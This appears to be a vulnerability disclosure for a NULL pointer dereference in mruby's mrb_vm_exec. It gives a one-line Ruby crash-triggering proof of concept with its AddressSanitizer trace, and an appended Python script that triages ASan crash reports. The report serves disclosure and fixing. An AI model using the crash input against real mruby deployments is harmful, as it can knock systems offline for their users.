NULL Pointer Dereference in mrb_vm_exec with super in mruby/mruby
Reported on
Mar 31st 2022
Description
NULL Pointer Dereference in mrb_vm_exec with super
Proof of Concept
o13 = Comparable.initialize(){||0x7f.instance_eval() do super rescue caller (0..1).sort_by() do break end end }
// PoC.js
./mruby 1.rb
#Result
ASAN:DEADLYSIGNAL
=================================================================
==19163==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55bde3b4162d bp 0x7ffcbe8d7ab0 sp 0x7ffcbe8d63c0 T0)
==19163==The signal is caused by a READ memory access.
==19163==Hint: address points to the zero page.
    #0 0x55bde3b4162c in mrb_vm_exec /home/xxx/mruby/src/vm.c:1752
    #1 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
    #2 0x55bde3b7b219 in mrb_run /home/xxx/mruby/src/vm.c:3034
    #3 0x55bde3b2fbc9 in mrb_yield_with_class /home/xxx/mruby/src/vm.c:879
    #4 0x55bde3b0b521 in mrb_mod_initialize /home/xxx/mruby/src/class.c:1648
    #5 0x55bde3b3fb19 in mrb_vm_exec /home/xxx/mruby/src/vm.c:1640
    #6 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
    #7 0x55bde3b7b42b in mrb_top_run /home/xxx/mruby/src/vm.c:3047
    #8 0x55bde3bedb2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890
    #9 0x55bde3bede42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933
    #10 0x55bde3afc128 in main /home/xxx/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
    #11 0x7f98eb47ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    #12 0x55bde3af9339 in _start (/home/xxx/mruby/bin/mruby+0xc2339)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/xxx/mruby/src/vm.c:1752 in mrb_vm_exec
==19163==ABORTING
Impact
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
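For triage of crashes like the one above, the following added example (not part of the original report and not mruby code) parses an AddressSanitizer SEGV report, classifies a fault address inside the first page as a NULL dereference at a small offset, and builds a de-duplication bucket from the first symbolized frame. The function name `triage`, the 4 KiB page size and the bucket format are assumptions made for this sketch.

```python
import os
import re

# First lines of the AddressSanitizer report shown above (frames #0-#2 only).
SAMPLE_REPORT = """\
==19163==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55bde3b4162d bp 0x7ffcbe8d7ab0 sp 0x7ffcbe8d63c0 T0)
==19163==The signal is caused by a READ memory access.
==19163==Hint: address points to the zero page.
    #0 0x55bde3b4162c in mrb_vm_exec /home/xxx/mruby/src/vm.c:1752
    #1 0x55bde3b31512 in mrb_vm_run /home/xxx/mruby/src/vm.c:1131
    #2 0x55bde3b7b219 in mrb_run /home/xxx/mruby/src/vm.c:3034
"""

PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, page zero never mapped

HEADER = re.compile(r"AddressSanitizer: SEGV on unknown address (0x[0-9a-fA-F]+)")
ACCESS = re.compile(r"caused by a (READ|WRITE) memory access")
# Frames with file:line[:column] only; "(libc.so.6+0x21c86)" style frames are skipped.
FRAME = re.compile(r"#(\d+) 0x[0-9a-fA-F]+ in (\S+) (\S+?):(\d+)(?::\d+)?\s*$", re.M)


def triage(report):
    """Classify an ASan SEGV report and build a de-duplication bucket."""
    header = HEADER.search(report)
    if header is None:
        raise ValueError("not an AddressSanitizer SEGV report")
    address = int(header.group(1), 16)
    access = ACCESS.search(report)
    frames = FRAME.findall(report)
    if not frames:
        raise ValueError("no symbolized frame found")
    _, func, path, line = frames[0]  # first frame that carries source info
    near_null = address < PAGE_SIZE
    return {
        # A fault inside page zero is consistent with reading a member at
        # that offset through a NULL pointer; anything else needs a closer look.
        "kind": "null-deref" if near_null else "wild-access",
        "offset": address if near_null else None,
        "access": access.group(1) if access else "UNKNOWN",
        "bucket": f"{func}@{os.path.basename(path)}:{line}",
    }


if __name__ == "__main__":
    print(triage(SAMPLE_REPORT))
```
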